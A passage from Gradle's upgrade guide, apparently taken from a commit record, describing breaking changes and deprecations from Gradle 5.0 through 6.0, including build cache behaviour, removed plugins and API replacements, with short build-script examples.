to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n
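\nA settings script sketch of the only supported shape going forward (the cache location is an assumption):\n\n```\n\/\/ settings.gradle\nbuildCache {\n    local {\n        \/\/ the local cache is always a DirectoryBuildCache\n        directory = new File(rootDir, 'build-cache')\n    }\n}\n```\n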
\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past, when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking, Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to keep the build executing no matter what, hiding problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will now cause the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\nlink:https:\/\/blog.gradle.org\/gradle-metadata-1.0[Gradle Module Metadata], officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means that, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilarly, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle would also look for a default artifact (`.jar`), which usually does not exist either.\nThis often caused a large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n
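\nA sketch of that opt-in (the repository URL is a placeholder):\n\n```\nrepositories {\n    maven {\n        url 'https:\/\/repo.example.com\/releases'\n        metadataSources {\n            mavenPom()\n            artifact() \/\/ also accept modules that only publish a default .jar\n        }\n    }\n}\n```\n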
\n==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated; use `validatePlugins` instead.\n  The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. Use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n  * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n
\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n    `embedded-kotlin`\n}\n\nrepositories {\n    jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use; however, they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to no longer include timestamps by default.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior led to broken Gradle Module Metadata and was difficult to understand due to the different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before, e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n
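\nA sketch of keeping the two aligned explicitly (the publication name and packaging type are hypothetical):\n\n```\npublishing {\n    publications {\n        mavenJava(MavenPublication) {\n            from components.java\n            pom { packaging = 'war' }\n        }\n    }\n}\n\n\/\/ keep the published artifact's extension in line with the packaging\njar.archiveExtension.set('war')\n```\n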
\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information, which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Executing Gradle without a settings file has been deprecated\n\nA Gradle build is defined by a `settings.gradle[.kts]` file in the current or parent directory.\nWithout a settings file, a Gradle build is undefined and will emit a deprecation warning.\n\nIn Gradle 7.0, Gradle will only allow you to invoke the `init` task or diagnostic command line flags, such as `--version`, with undefined builds.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate` and emits a deprecation warning.\nTo avoid confusion, this scenario will become an error in Gradle 7.0.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n  Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n  Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n  A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been 
removed.\n  `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n  The method was never meant to be public.\n* File paths in the link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n  Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation processing for Groovy now fails the build.\n  Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` can no longer inject the metadata or ivy descriptor.\n  Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n  Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n  Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after the task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. First, it prevents accidental changes to the property value during task execution, which could cause Gradle's up-to-date checks and build cache lookups\nto use values different from those used by the task action. Second, it improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n
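\nA minimal sketch of the supported route through the `signing` extension (the GPG-command signatory and what gets signed are assumptions):\n\n```\nsigning {\n    useGpgCmd() \/\/ or any other supported signatory configuration\n    sign configurations.archives\n}\n```\n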
\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n
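\nA sketch of submitting work with an explicit classpath under the 5.6 API (`MyAction` is a hypothetical `WorkAction` implementation and `workerDeps` a hypothetical configuration holding its dependencies):\n\n```\nworkerExecutor.classLoaderIsolation { spec ->\n    \/\/ declare everything the action needs; nothing leaks from the Gradle runtime anymore\n    spec.classpath.from(configurations.workerDeps)\n}.submit(MyAction) { parameters ->\n    \/\/ configure MyAction's WorkParameters here\n}\n```\n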
\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now, when creating multiple copies, each will have a unique name by adding an index starting from the second copy (e.g. `CompileOnlyCopy2`).\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n    resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n==== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebug()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n
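\nA sketch of the new element on a hypothetical `JavaExec` task (main class, classpath and port are assumptions):\n\n```\ntask runApp(type: JavaExec) {\n    main = 'com.example.Main'\n    classpath = sourceSets.main.runtimeClasspath\n    debugOptions {\n        enabled = true\n        port = 5005\n        server = true\n        suspend = true\n    }\n}\n```\n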
\n==== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build, and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two builds' build scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}`, the receiver must be explicitly qualified, i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n
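\nA Kotlin DSL sketch of the required qualification (`libVersion` is a hypothetical extra property):\n\n```kotlin\ndependencies {\n    \/\/ an unqualified `extra` here would resolve against the `dependencies` object itself\n    implementation(\"org.example:lib:${project.extra[\"libVersion\"]}\")\n}\n```\n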
\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, produce a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affects the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n  - Variant 'apiElements' capability test:producer:unspecified:\n      - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n      - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n      - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n  - Variant 'runtimeElements' capability test:producer:unspecified:\n      - Required 
org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n      - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n      - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can work around it by disabling this new behavior on the consumer side:\n\n```\njava {\n    disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`),\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nNone.\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n    validateTaskProperties.getClasses().setFrom(fileCollection)\n    validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\n\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error-prone, so `ObjectFactory` now returns instances with an empty collection as their initial value.\n
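\nA quick illustration of the new default (the property is a hypothetical example in a build script):\n\n```\ndef names = objects.listProperty(String)\nprintln names.get() \/\/ now prints [], previously failed with a missing-value error\n```\n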
\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follows the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions is no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","old_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/      http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 